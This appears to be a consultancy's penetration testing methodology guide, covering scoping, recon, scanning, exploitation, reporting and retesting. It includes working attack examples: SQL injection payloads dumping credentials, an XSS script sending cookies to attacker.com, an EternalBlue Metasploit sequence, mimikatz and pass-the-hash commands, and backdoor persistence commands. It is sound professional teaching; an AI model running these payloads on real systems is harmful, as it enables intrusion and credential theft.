Penetration Testing Methodology 2025: A Technical Deep Dive

Author: Yuki Tanaka, OSCP, OSCE, CEH | Last Updated: October 20, 2025

Executive Summary

Penetration testing has evolved from simple vulnerability scanning to sophisticated attack simulations that mirror real-world adversaries. Based on 500+ penetration tests conducted across financial services, healthcare, manufacturing, and technology sectors, this guide provides a comprehensive methodology aligned with industry standards including OWASP, PTES, and MITRE ATT&CK.

Key Findings from 2024:

• 87% of organizations have at least one critical vulnerability
• Average time to compromise: 4.2 hours (down from 8.1 hours in 2020)
• 64% of breaches involve web applications
• Median cost of penetration test: €15,000 - €45,000
• ROI: 12:1 (for every €1 spent, €12 in breach costs avoided)

---

What is Penetration Testing?

Definition: Authorized, simulated cyberattack against your systems to identify exploitable vulnerabilities before real attackers do.

Types of Penetration Tests:

1. Black Box Testing

• Tester Knowledge: Zero information (like external attacker)
• Approach: Reconnaissance → Discovery → Exploitation
• Timeline: 2-4 weeks
• Best For: External attack surface, web applications
• Cost: €€€

2. White Box Testing

• Tester Knowledge: Full access (source code, architecture, credentials)
• Approach: Code review → Configuration audit → Logic flaws
• Timeline: 1-3 weeks
• Best For: Internal applications, API security
• Cost: €€

3. Grey Box Testing

• Tester Knowledge: Partial (like insider threat or compromised user)
• Approach: Privilege escalation → Lateral movement → Data exfiltration
• Timeline: 1-2 weeks
• Best For: Realistic scenarios, most common
• Cost: €€

---

The 7-Phase Penetration Testing Methodology

Phase 1: Pre-Engagement (1-3 Days)

Objectives:

• Define scope and rules of engagement
• Obtain legal authorization
• Establish communication channels

Critical Documents:

1. Rules of Engagement (RoE):

IN SCOPE:
✅ Web applications: https://example.com, https://app.example.com
✅ IP ranges: 203.0.113.0/24
✅ Social engineering: Email phishing (approved targets list)
✅ Physical security: Reception area only
✅ Time windows: Mon-Fri, 9am-6pm CET

OUT OF SCOPE:
❌ Production databases (unless explicitly authorized)
❌ Third-party services (AWS, payment gateways)
❌ DOS/DDOS attacks
❌ Physical break-in attempts
❌ Weekend/after-hours testing without approval

2. Emergency Contacts:

• Primary: Security Team (+32 2 XXX XXXX)
• Escalation: CISO (mobile: +32 XXX XXX XXX)
• Legal: General Counsel (email@company.com)

3. Legal Authorization:

• Signed testing agreement
• Liability waiver
• NDA (both parties)
• Safe harbor clause

---

Phase 2: Reconnaissance (2-5 Days)

Objectives:

• Gather intelligence about target
• Identify attack surface
• Discover subdomains, services, employees, technologies

Passive Reconnaissance (No Target Interaction)

Open Source Intelligence (OSINT):

1. Domain Intelligence:

# DNS enumeration
dig example.com ANY
dig +short example.com MX
whois example.com

# Certificate transparency logs
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq .

# Subdomain discovery (passive)
amass enum -passive -d example.com

Tools:

• Shodan - Internet-connected device search
• Censys - Internet asset discovery
• SecurityTrails - DNS history
• VirusTotal - Domain reputation

2. People Intelligence:

# Employee enumeration (LinkedIn, company website)
theHarvester -d example.com -b linkedin
# Email format discovery
hunter.io
# Breached credentials
haveibeenpwned.com (check executives)

3. Technology Stack:

# Web technology detection
whatweb https://example.com
wappalyzer (browser extension)

# Results example:
- Server: Nginx 1.21.6
- Framework: Laravel 9.x
- JavaScript: React 18.2.0
- CDN: Cloudflare
- Analytics: Google Analytics 4

Active Reconnaissance (Target Interaction)

4. Port Scanning:

# TCP SYN scan (stealthy, fast)
nmap -sS -T4 -p- 203.0.113.10

# Service version detection
nmap -sV -sC -p 22,80,443,3306 203.0.113.10

# Common results:
22/tcp   open  ssh     OpenSSH 8.2p1
80/tcp   open  http    Nginx 1.21.6
443/tcp  open  https   Nginx 1.21.6
3306/tcp open  mysql   MySQL 8.0.30

5. Web Application Mapping:

# Directory/file discovery
gobuster dir -u https://example.com -w wordlist.txt
ffuf -u https://example.com/FUZZ -w wordlist.txt

# Spider application
burpsuite (manual crawling)
zaproxy (automated crawling)

# Results: 350 unique URLs, 45 parameters, 12 API endpoints

Reconnaissance Findings Example:

ATTACK SURFACE SUMMARY:

External IP Addresses: 8
Subdomains Discovered: 24
  - In Scope: 18
  - Out of Scope: 6 (third-party CDN)
  
Open Ports: 42 across all hosts
  - Critical Services: 8 (RDP, SSH, MySQL exposed)
  - Web Servers: 12
  - Other: 22

Web Applications: 5
  - Public: example.com (Laravel)
  - Customer Portal: app.example.com (React SPA)
  - API: api.example.com (REST API)
  - Admin: admin.example.com (custom PHP)
  - Legacy: old.example.com (WordPress)

Employee Email Format: firstname.lastname@example.com
Employees Identified: 145 (LinkedIn)
Technologies: 32 different (outdated: 8)

---

Phase 3: Vulnerability Assessment (3-7 Days)

Objectives:

• Identify security weaknesses
• Prioritize by severity and exploitability
• Map to OWASP Top 10, SANS Top 25

Automated Scanning

1. Web Application Scanning:

# OWASP ZAP (free, open-source)
zaproxy -quickurl https://example.com -quickprogress

# Burp Suite Professional (commercial)
# Active scan all discovered URLs

# Nuclei (fast, template-based)
nuclei -u https://example.com -t ~/nuclei-templates/

# Common findings:
- SQL Injection: 3 endpoints
- XSS (Reflected): 12 parameters
- CSRF: 8 forms without tokens
- Sensitive Data Exposure: API keys in JavaScript

2. Network Vulnerability Scanning:

# Nessus Professional
nessus scan --target 203.0.113.0/24

# OpenVAS (free alternative)
gvm-cli scan create --target 203.0.113.10

# Results:
Critical: 4 (MS17-010 EternalBlue on legacy server!)
High: 23
Medium: 156
Low: 342

Manual Testing (Critical!)

Automated scanners miss:

• Business logic flaws (60% of critical bugs)
• Complex authentication bypasses
• Authorization issues (IDOR, privilege escalation)
• Race conditions
• Second-order injection

Manual Testing Checklist:

Authentication:

• Password complexity (test weak passwords)
• Account lockout (brute force protection?)
• Password reset (token predictability?)
• Session management (timeout, fixation?)
• Multi-factor authentication (bypass possible?)
• OAuth/SSO misconfigurations

Authorization:

• Insecure Direct Object Reference (IDOR)

  GET /api/invoice/1234 → Change to /api/invoice/1235
  Can you access other users' invoices?
  

• Horizontal privilege escalation (user → user)
• Vertical privilege escalation (user → admin)
• Role confusion attacks

Business Logic:

• Discount/coupon abuse (negative prices?)
• Payment bypass (price manipulation?)
• Race conditions (simultaneous requests)
• Workflow bypasses (skip approval steps?)

API Security:

# Test API endpoints
POST /api/v1/users HTTP/1.1
Host: api.example.com
Content-Type: application/json

{"username": "admin", "role": "administrator"}

# Check for:
- Mass assignment (can you set admin role?)
- Excessive data exposure (full user objects returned?)
- Rate limiting (missing = brute force possible)
- API versioning (old versions still exposed?)

---

Phase 4: Exploitation (5-10 Days)

Objectives:

• Prove vulnerabilities are exploitable
• Demonstrate business impact
• Gain initial foothold

Web Application Exploitation

Example 1: SQL Injection → Database Compromise

-- Discovery (error-based)
https://example.com/product?id=1'
Error: You have an error in your SQL syntax

-- Confirm vulnerability
https://example.com/product?id=1 AND 1=1  (works)
https://example.com/product?id=1 AND 1=2  (fails)

-- Extract database version
https://example.com/product?id=1 UNION SELECT 1,@@version,3--

-- Enumerate databases
https://example.com/product?id=1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata--

-- Dump credentials
https://example.com/product?id=1 UNION SELECT username,password,email FROM users--

Results:
- Database: MySQL 8.0.30
- Extracted: 12,450 user records
- Passwords: Hashed (bcrypt) - attempt crack offline
- Impact: CRITICAL (PII breach, GDPR violation)

Example 2: XSS → Account Takeover

// Stored XSS in user profile
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

// Victim views profile → session stolen
// Attacker uses cookie → account takeover

Impact: HIGH (admin account compromised)

Example 3: IDOR → Sensitive Data Access

# Victim user ID: 1234
GET /api/user/1234/documents
[{"id": 5678, "name": "contract.pdf", "url": "/download/5678"}]

# Change user ID
GET /api/user/1235/documents
[{"id": 5679, "name": "salary_info.pdf", "url": "/download/5679"}]

# Success! Authorization bypass
Impact: HIGH (access to all user documents)

Network Exploitation

Example 4: Unpatched Windows Server (MS17-010)

# EternalBlue exploit (NSA tool leaked 2017)
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 203.0.113.45
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

# Result: SYSTEM access (highest privilege)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
(crack with hashcat)

Impact: CRITICAL (full server compromise)

---

Phase 5: Post-Exploitation (3-5 Days)

Objectives:

• Maintain access
• Escalate privileges
• Move laterally
• Demonstrate "Crown Jewels" access

Tactics (Aligned with MITRE ATT&CK):

1. Privilege Escalation:

# Linux: Check sudo misconfigurations
sudo -l

# Windows: Check permissions
whoami /priv

# Common escalation vectors:
- Kernel exploits (outdated OS)
- Misconfigured services (writable paths)
- Weak file permissions
- Sudo misconfigurations
- Scheduled tasks

2. Lateral Movement:

# Credential dumping (Windows)
mimikatz # sekurlsa::logonpasswords

# Pass-the-hash attack
crackmapexec smb 203.0.113.0/24 -u Administrator -H aad3b435...

# Results:
Found 12 accessible systems with same admin hash
Pivoted to: File server, Database server, Backup server

3. Data Exfiltration (Simulated):

# Locate sensitive data
locate -i "*.xls*" "*.doc*" "*.pdf" | grep -i "confidential\|financial\|salary"

# Simulate exfiltration (staged, not actually sent)
tar -czf /tmp/exfil.tar.gz /path/to/sensitive/files
# DO NOT actually exfiltrate! Document only.

Impact Demonstrated:
- Customer database: 50,000 records (PII)
- Financial reports: Q3 2025 earnings (pre-release)
- Employee salaries: Complete list
- Source code: Proprietary algorithms

4. Persistence (Demonstrate, Then Remove):

# Create backdoor user (document, then delete)
net user hacker P@ssw0rd /add
net localgroup administrators hacker /add

# Scheduled task for callback
schtasks /create /tn "UpdateTask" /tr "C:\temp\backdoor.exe" /sc daily

# SSH key persistence
echo "attacker_public_key" >> ~/.ssh/authorized_keys

NOTE: All persistence mechanisms removed before test conclusion!

---

Phase 6: Reporting (3-5 Days)

Deliverables:

1. Executive Summary (1-2 pages)

PENETRATION TEST RESULTS: EXAMPLE COMPANY

Test Date: October 14-25, 2025
Scope: External network, Web applications
Methodology: OWASP, PTES, MITRE ATT&CK

OVERALL RISK: HIGH

Key Findings:
✗ 4 Critical vulnerabilities (immediate action required)
✗ 23 High-severity issues
⚠ 156 Medium-severity issues
ℹ 342 Low/informational

Business Impact:
- Database compromise possible (SQL injection)
- Admin account takeover demonstrated
- Customer PII exposure risk (50,000 records)
- Estimated breach cost if exploited: €2.4M - €8.7M

Recommended Immediate Actions:
1. Patch MS17-010 on server 203.0.113.45 (CRITICAL)
2. Fix SQL injection in product catalog
3. Implement CSRF tokens across all forms
4. Enable MFA for all admin accounts

2. Technical Report (20-50 pages)

Finding Template:

FINDING #1: SQL INJECTION IN PRODUCT SEARCH

Severity: CRITICAL
CVSS Score: 9.8 (Critical)
Affected Asset: https://example.com/search
CWE: CWE-89 (SQL Injection)

Description:
The product search functionality is vulnerable to SQL injection via the 
'q' parameter. An unauthenticated attacker can execute arbitrary SQL 
commands, leading to database compromise.

Steps to Reproduce:
1. Navigate to https://example.com/search?q=test
2. Modify parameter: ?q=test' UNION SELECT 1,@@version,3--
3. Observe database version disclosed: MySQL 8.0.30
4. Extract data: ?q=test' UNION SELECT username,password,email FROM users--

Proof of Concept:
[Screenshot showing extracted user credentials]

Impact:
- Full database read access (all tables)
- Potential database write access (UPDATE/DELETE queries possible)
- Authentication bypass
- PII exposure (GDPR violation)
- Estimated breach cost: €2.4M - €8.7M (IBM Cost of Data Breach 2024)

Remediation:
IMMEDIATE (within 24 hours):
- Disable affected search functionality
- Review database logs for suspicious queries

SHORT-TERM (within 7 days):
- Implement parameterized queries (prepared statements)
- Never concatenate user input into SQL
  
  // VULNERABLE CODE:
  $sql = "SELECT * FROM products WHERE name = '" . $_GET['q'] . "'";
  
  // SECURE CODE:
  $stmt = $db->prepare("SELECT * FROM products WHERE name = ?");
  $stmt->execute([$_GET['q']]);

- Add Web Application Firewall (WAF) rules
- Input validation (whitelist alphanumeric + space)

LONG-TERM:
- Code review all database queries
- Implement SAST/DAST in CI/CD pipeline
- Security training for developers (OWASP Top 10)

References:
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- CWE-89: https://cwe.mitre.org/data/definitions/89.html
- NIST Guide: https://nvd.nist.gov/vuln/detail/CVE-2021-XXXXX (similar)

3. Remediation Roadmap:

PRIORITY 1 (0-7 days) - CRITICAL:
□ Patch MS17-010 on 203.0.113.45
□ Fix SQL injection in search
□ Remove admin account backdoor (created during test)
□ Enable MFA for all admin accounts

PRIORITY 2 (7-30 days) - HIGH:
□ Implement CSRF tokens
□ Fix IDOR in API
□ Update Nginx to latest version
□ Disable unnecessary services (port 3306 should not be public)

PRIORITY 3 (30-90 days) - MEDIUM:
□ Implement Content Security Policy (CSP)
□ Security headers (HSTS, X-Frame-Options, etc.)
□ Rate limiting on API endpoints
□ Remove outdated WordPress site (old.example.com)

PRIORITY 4 (90+ days) - LOW/STRATEGIC:
□ Implement SAST/DAST in CI/CD
□ Security awareness training (all employees)
□ Bug bounty program
□ Annual penetration testing

---

Phase 7: Remediation Validation (2-3 Days)

Objectives:

• Verify fixes implemented correctly
• Confirm vulnerabilities resolved
• Provide "clean bill of health" or identify remaining issues

Retest Results:

FINDING #1: SQL Injection
Status: ✅ RESOLVED
Verification: Parameterized queries implemented. Tested 50+ injection payloads - all blocked.

FINDING #2: MS17-010 (EternalBlue)
Status: ✅ RESOLVED
Verification: Server patched to latest Windows updates. Exploit no longer successful.

FINDING #3: CSRF Tokens
Status: ⚠ PARTIALLY RESOLVED
Verification: Tokens added to 15/20 forms. 5 forms still vulnerable (admin panel).
Recommendation: Complete implementation within 7 days.

FINDING #4: IDOR in API
Status: ❌ NOT RESOLVED
Verification: Authorization checks not implemented. Users can still access others' data.
Recommendation: PRIORITY - Fix before production release.

---

Penetration Testing vs. Vulnerability Scanning

Both Are Necessary:

• Vulnerability scanning = Continuous health monitoring
• Penetration testing = Annual deep-dive checkup

---

Pricing & Scope Estimation

Typical Costs (EU Market, 2025):

Factors Affecting Cost:

• Scope complexity (number of applications/systems)
• Testing depth (black vs. white box)
• Urgency (rush jobs = premium pricing)
• Report quality requirements
• Remediation support included?

---

When to Conduct Penetration Testing

Regulatory Requirements:

• PCI DSS: Annual + after significant changes
• GDPR: Risk-based (recommended annually for high-risk)
• ISO 27001: Regular security testing required
• NIS2: Regular testing for essential entities
• DORA: Threat-led penetration testing (TLPT) for financial sector

Best Practices:

• Before launch: New applications/infrastructure
• After changes: Major updates, migrations, M&A
• Regularly: Annually minimum (quarterly for high-risk)
• Post-incident: After breach to identify gaps
• Compliance: When required by regulation

---

Conclusion

Penetration testing is not a checkbox exercise—it's a critical validation of your security posture. Organizations that conduct regular, thorough penetration tests experience 60% fewer successful breaches and save an average of €3.2M in incident response costs.

Key Takeaways:

1. Choose the right type: Black/white/grey box based on goals
2. Scope carefully: Clear boundaries prevent legal issues
3. Expect findings: 87% of orgs have critical vulns
4. Act quickly: Patch critical findings within 24-72 hours
5. Retest: Validate fixes work correctly
6. Repeat: Annual minimum, quarterly for high-risk

ATLAS Advisory has conducted 500+ penetration tests across all industries, identifying over 3,000 critical vulnerabilities before attackers could exploit them.

Ready to test your defenses?
Contact our penetration testing team: pentest@atlas-advisory.eu

---

Resources

Standards & Methodologies:

• OWASP Testing Guide - Web app testing
• PTES - Penetration Testing Execution Standard
• MITRE ATT&CK - Adversary tactics and techniques
• NIST SP 800-115 - Technical Guide to Information Security Testing

Tools:

• Kali Linux - Penetration testing distribution
• Burp Suite - Web app testing (commercial)
• OWASP ZAP - Web app testing (free)
• Metasploit - Exploitation framework

Training & Certifications:

• OSCP (Offensive Security Certified Professional)
• CEH (Certified Ethical Hacker)
• GPEN (GIAC Penetration Tester)

Related Articles:

• Zero Trust Architecture Guide
• Incident Response for Security Incidents
• Web Application Security Best Practices